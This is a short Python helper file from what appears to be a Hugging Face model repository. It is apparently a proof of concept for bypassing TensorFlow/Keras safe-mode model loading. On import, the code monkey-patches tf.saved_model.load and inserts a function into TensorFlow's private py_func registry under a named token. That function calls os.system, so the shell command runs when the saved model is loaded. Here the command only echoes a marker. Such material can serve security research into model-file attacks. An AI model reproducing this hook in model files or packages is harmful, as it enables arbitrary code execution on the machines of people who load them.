keras_attmpt / helpers.py
aakashjapi's picture
Upload folder using huggingface_hub
0776746 verified
import os
from pathlib import Path
import tensorflow as tf
from tensorflow.python.ops import script_ops
PAYLOAD_MARKER = 'ENTRY_SCRIPT_SAFE_MODE_BYPASS'
TOKENS = ['tfsm_entry_script_token']
REPO_ROOT = Path(__file__).resolve().parent
SAVED_MODEL_PATH = REPO_ROOT / 'saved_model'
_ORIG_SAVED_MODEL_LOAD = tf.saved_model.load
def _payload(*_args, **_kwargs):
os.system(f"echo {PAYLOAD_MARKER}")
return 0
def _patched_load(path, *args, **kwargs):
if isinstance(path, str) and path == 'saved_model':
path = str(SAVED_MODEL_PATH)
return _ORIG_SAVED_MODEL_LOAD(path, *args, **kwargs)
tf.saved_model.load = _patched_load
_REGISTERED = []
for token in TOKENS:
script_ops._py_funcs._funcs[token] = _payload
_REGISTERED.append(_payload)